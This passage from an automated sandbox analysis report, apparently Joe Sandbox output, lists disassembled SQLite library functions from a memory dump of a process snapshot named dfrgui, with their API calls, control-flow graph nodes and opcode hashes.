                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: memcmp$sqlite3_mutex_try
                                  • String ID: 0
                                  • API String ID: 2794522359-4108050209
                                  • Opcode ID: 0160b7bd467754a1be7566d17dcdcbad49e11ee0d4d5de03d76100ee28c1ba50
                                  • Instruction ID: 0a16afa4c4135298fcb193e569f32786fff417632bb42ec1a1d79d0830f68743
                                  • Opcode Fuzzy Hash: 0160b7bd467754a1be7566d17dcdcbad49e11ee0d4d5de03d76100ee28c1ba50
                                  • Instruction Fuzzy Hash: E9029B78A042659FEB05CFA8C580799BBF1BFC8308F64C16DD8499B395E774E885CB90
                                  Function 61E5EE52 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 176COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 61E03ED3: sqlite3_stricmp.SQLITE3 ref: 61E03F00
                                    • Part of subcall function 61E03ED3: sqlite3_stricmp.SQLITE3 ref: 61E03F18
                                  • sqlite3_strnicmp.SQLITE3 ref: 61E5EEDE
                                    • Part of subcall function 61E0463F: sqlite3_stricmp.SQLITE3 ref: 61E04672
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_stricmp$sqlite3_strnicmp
                                  • String ID: J'a$no such table$no such view
                                  • API String ID: 2198927396-1382575391
                                  • Opcode ID: e9bf0e2655f15f3f2b2ebcd0c234de71360c086210d26cbada8d896a746b78bd
                                  • Instruction ID: 426e13f1677c2d090e6e967c47eec4bddab8cf74361bcb6033b70e25106d7e88
                                  • Opcode Fuzzy Hash: e9bf0e2655f15f3f2b2ebcd0c234de71360c086210d26cbada8d896a746b78bd
                                  • Instruction Fuzzy Hash: 01610570B043469FDB40DFA9D884A4EBBF1AF88348F24C42DE858DB351E73AD8518B51
                                  Function 61E27230 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 833 61e27230-61e27258 834 61e272a2-61e272c1 833->834 835 61e2725a 833->835 838 61e272c4-61e272eb ReadFile 834->838 836 61e27261-61e27270 835->836 837 61e2725c-61e2725f 835->837 841 61e27272 836->841 842 61e27285-61e2729f 836->842 837->834 837->836 839 61e27306-61e2730f 838->839 840 61e272ed-61e27300 call 61e26d50 838->840 839->840 851 61e27311-61e2731e call 61e17525 839->851 848 61e27302-61e27304 840->848 849 61e27345-61e27351 840->849 844 61e27274-61e27276 841->844 845 61e27278-61e27283 841->845 842->834 844->842 844->845 845->848 850 61e27356-61e2735d 848->850 849->850 851->838 854 61e27320-61e27343 call 61e2640a 851->854 854->850
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: winRead
                                  • API String ID: 2738559852-2759563040
                                  • Opcode ID: 43dd954d8f3bc3033e45f23ca39855a6f74d88ce3bf6cb16cd30acc37c52a211
                                  • Instruction ID: 01be846b1c914381d43bd43a881ac94fd44caf91cc24d2ebda9dddbaf8e0f9b4
                                  • Opcode Fuzzy Hash: 43dd954d8f3bc3033e45f23ca39855a6f74d88ce3bf6cb16cd30acc37c52a211
                                  • Instruction Fuzzy Hash: 6541E072E00259DBCF44CFA9D89158EBBF2BF89314F218529EC68A7344D730E9418B91
                                  Function 61E0FF10 Relevance: 3.1, APIs: 2, Instructions: 78COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 857 61e0ff10-61e0ff26 858 61e1000b 857->858 859 61e0ff2c-61e0ff32 857->859 861 61e1000d-61e10014 858->861 859->858 860 61e0ff38-61e0ff41 859->860 862 61e10000-61e10009 860->862 863 61e0ff47-61e0ff65 sqlite3_mutex_enter 860->863 862->861 866 61e0ff67 863->866 867 61e0ff6d-61e0ff7c 863->867 866->867 868 61e0ffc0-61e0ffc3 call 61e27424 867->868 869 61e0ff7e 867->869 872 61e0ffc9-61e0ffcd 868->872 870 61e0ff80-61e0ff83 869->870 871 61e0ff85-61e0ff9c 869->871 870->868 870->871 873 61e0ffb6 871->873 874 61e0ff9e 871->874 875 61e0ffef-61e0fffe sqlite3_mutex_leave 872->875 876 61e0ffcf-61e0ffea call 61e017b3 call 61e0149c * 2 872->876 873->868 877 61e0ffa0-61e0ffa3 874->877 878 61e0ffa5-61e0ffb4 call 61e09b3d 874->878 875->861 876->875 877->873 877->878 878->868
                                  APIs
                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E0FF4F
                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E0FFF7
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                  • String ID:
                                  • API String ID: 1477753154-0
                                  • Opcode ID: f93a771da4db029c24692d7fadfb4c21b495cda645e14dffca9b7d6ee63b1441
                                  • Instruction ID: c305576da3b0ecb48e330b718133b7d44e0cdfe0b3ac8a4b24bcde8ee11f1326
                                  • Opcode Fuzzy Hash: f93a771da4db029c24692d7fadfb4c21b495cda645e14dffca9b7d6ee63b1441
                                  • Instruction Fuzzy Hash: C4218131A14E118BDF009FBAC48435D7AE1BB8B719F258A2EE514D7384E739C8E18BD5
                                  Function 61E27424 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 887 61e27424-61e2743b malloc 888 61e2744a-61e27465 sqlite3_log 887->888 889 61e2743d-61e27448 887->889 890 61e27468-61e2746d 888->890 889->890
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: mallocsqlite3_log
                                  • String ID:
                                  • API String ID: 2785431543-0
                                  • Opcode ID: 276100c768e920ba00dee1f4797df752b3dbc18f22c391b78bb7bec4611f80a5
                                  • Instruction ID: 44dbbf8c901baac61c8ecb04f568bbef4a134eeb66f8290cc42548717ab5ec89
                                  • Opcode Fuzzy Hash: 276100c768e920ba00dee1f4797df752b3dbc18f22c391b78bb7bec4611f80a5
                                  • Instruction Fuzzy Hash: 93F015B0C083099BCB00AF65C991A09BFE8EB44208F14C469E9884F341E239E584CB52
                                  Function 61E1341E Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 891 61e1341e-61e1342f 892 61e13431-61e13433 891->892 893 61e13435-61e13438 892->893 894 61e1343a-61e13440 892->894 893->892 895 61e13442-61e13444 894->895 896 61e13446-61e13449 895->896 897 61e1344b-61e1345c 895->897 896->895 898 61e13462-61e1346e 897->898 899 61e13578-61e1357f 897->899 900 61e13470-61e13479 sqlite3_free 898->900 901 61e1347e-61e13493 898->901 900->901 902 61e134d1-61e134d3 901->902 903 61e13495-61e13497 901->903 905 61e134d5-61e134f8 902->905 903->902 904 61e13499-61e1349e 903->904 904->905 906 61e134a0-61e134ab call 61e016c9 call 61e0ff10 904->906 907 61e134fa-61e13506 905->907 908 61e1354f-61e1356e 905->908 915 61e134b0-61e134bd call 61e016da 906->915 910 61e13508-61e1350c 907->910 908->899 911 61e13523-61e1354d 910->911 912 61e1350e-61e13521 910->912 911->899 912->910 915->905 918 61e134bf-61e134cf call 61e017b3 915->918 918->905
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_free
                                  • String ID:
                                  • API String ID: 2313487548-0
                                  • Opcode ID: 87168b047b5a2b61cb458529a724349ba2dd493344365c1e585b9fe5b349bb09
                                  • Instruction ID: 47250bfb4760a9e80668fb4a4de0eccc309735b3899ac2f487d8b3ad702b8b4a
                                  • Opcode Fuzzy Hash: 87168b047b5a2b61cb458529a724349ba2dd493344365c1e585b9fe5b349bb09
                                  • Instruction Fuzzy Hash: F9417372D092258BDF05CF69C4813D97AE0BF48724F1982BDCC59AF349D775D8418BA4

                                  Non-executed Functions

                                  Function 61E24442 Relevance: 10.7, APIs: 7, Instructions: 247COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_value_int.SQLITE3 ref: 61E24497
                                  • sqlite3_value_bytes.SQLITE3 ref: 61E244B7
                                  • sqlite3_value_blob.SQLITE3 ref: 61E244C4
                                  • sqlite3_value_text.SQLITE3 ref: 61E244DB
                                  • sqlite3_value_int.SQLITE3 ref: 61E2452B
                                  • sqlite3_result_text64.SQLITE3 ref: 61E2467B
                                  • sqlite3_result_blob64.SQLITE3 ref: 61E246D5
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_value_int$sqlite3_result_blob64sqlite3_result_text64sqlite3_value_blobsqlite3_value_bytessqlite3_value_text
                                  • String ID:
                                  • API String ID: 3992148849-0
                                  • Opcode ID: 49dccd325679344612dcd06aafa1b0fbd2af517bcecb88077b31fd9828ec60c6
                                  • Instruction ID: 222a9eaf738a168c7fb1e3f7314a14c0b4e0b63ae4b52840b5189acd0a309c3b
                                  • Opcode Fuzzy Hash: 49dccd325679344612dcd06aafa1b0fbd2af517bcecb88077b31fd9828ec60c6
                                  • Instruction Fuzzy Hash: FA919675E44259CFDB11CFACC8A069DBBF1BB89324F29C22ED8A497394D734D8418B51
                                  Function 61E1B9F9 Relevance: 7.8, APIs: 5, Instructions: 337COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_malloc$memcmpsqlite3_freesqlite3_realloc
                                  • String ID:
                                  • API String ID: 1984881590-0
                                  • Opcode ID: c2d0c6c517767d9cd103a778dad35651363c25f977db5bc4fd9a974a5d75d667
                                  • Instruction ID: a83bbfa7232e8b966cfbe0000d79e78f6fa96f18e61162b789132978e7fc1443
                                  • Opcode Fuzzy Hash: c2d0c6c517767d9cd103a778dad35651363c25f977db5bc4fd9a974a5d75d667
                                  • Instruction Fuzzy Hash: 5FE10575A082498FDB04CF68C481A9ABBF2FF88314F29C569DC15AB35AD734E951CB90
                                  Function 61E89CA0 Relevance: 7.6, APIs: 5, Instructions: 54timethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSystemTimeAsFileTime.KERNEL32 ref: 61E89CD9
                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E89CEA
                                  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E89CF2
                                  • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E89CFA
                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E89D09
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                  • String ID:
                                  • API String ID: 1445889803-0
                                  • Opcode ID: d7768c31a37fa6e60d4c0cc94b0621b02a0e8ad8da4965ade7011daf050ff320
                                  • Instruction ID: 8e9f075d24577ed996b19a49b390543a40d0d3226bfaa3d59714b772d5ac8289
                                  • Opcode Fuzzy Hash: d7768c31a37fa6e60d4c0cc94b0621b02a0e8ad8da4965ade7011daf050ff320
                                  • Instruction Fuzzy Hash: C0119EB69147008FDB10EFB9E48854FBBF4FB8A654F010929E448C7210DB35D8988BA2
                                  Function 61E6F79E Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 182COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E6F7B7
                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E6F9C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                  • String ID: BINARY$INTEGER
                                  • API String ID: 1477753154-1676293250
                                  • Opcode ID: f4ece91d33f9ffdce3323fba97badfb599fbc81c92b576de6ee77ff95142c21b
                                  • Instruction ID: 212c11a4f96f14697d39152aceded5fc1aab67c1decfd1ba7cc17a071375d3f3
                                  • Opcode Fuzzy Hash: f4ece91d33f9ffdce3323fba97badfb599fbc81c92b576de6ee77ff95142c21b
                                  • Instruction Fuzzy Hash: A3713574A406599FDB00CFA9C490B9EBBF5BF88358F65C029E858AB350D738E841CF90
                                  Function 61E42DAC Relevance: 6.4, APIs: 4, Instructions: 418COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E42DC1
                                    • Part of subcall function 61E12E95: sqlite3_mutex_try.SQLITE3(?,?,?,61E12F15), ref: 61E12E35
                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E42DDA
                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E42EEE
                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E43309
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                  • String ID:
                                  • API String ID: 2068833801-0
                                  • Opcode ID: 38986d2ff847607ff47dd8c7dd9534c6886d5b438113051851e003b8b675e6ae
                                  • Instruction ID: 660afe740ab36d11c78c90e1966b81f27251e4928bdb9d4c3f42b1b63b43bb98
                                  • Opcode Fuzzy Hash: 38986d2ff847607ff47dd8c7dd9534c6886d5b438113051851e003b8b675e6ae
                                  • Instruction Fuzzy Hash: C0021574A046168FDB21CFA9E580A8DB7F1BF98318F24C529E855EB311D770E886CB41
                                  Function 61E295EC Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_bind_int64.SQLITE3 ref: 61E2962E
                                    • Part of subcall function 61E2945C: sqlite3_mutex_leave.SQLITE3 ref: 61E2949B
                                  • sqlite3_bind_double.SQLITE3 ref: 61E29651
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_bind_doublesqlite3_bind_int64sqlite3_mutex_leave
                                  • String ID:
                                  • API String ID: 1465616180-0
                                  • Opcode ID: fc41e5385bd80009c07e4b512d493312300a0f7f5d25d54c18e7c875f7fa3afb
                                  • Instruction ID: 932aa842bf32f2cb67ce2642f9cf6a23c90ccd21fa9dd1b8f7a9017da6c40a73
                                  • Opcode Fuzzy Hash: fc41e5385bd80009c07e4b512d493312300a0f7f5d25d54c18e7c875f7fa3afb
                                  • Instruction Fuzzy Hash: 8F219AB05087249BDB14DF58D4E02A9BBE0FB48324F24E55EECA94B3A5D334C881CB92
                                  Function 61E296D3 Relevance: 4.5, APIs: 3, Instructions: 44COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E296ED
                                  • sqlite3_bind_zeroblob.SQLITE3 ref: 61E29712
                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E29732
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
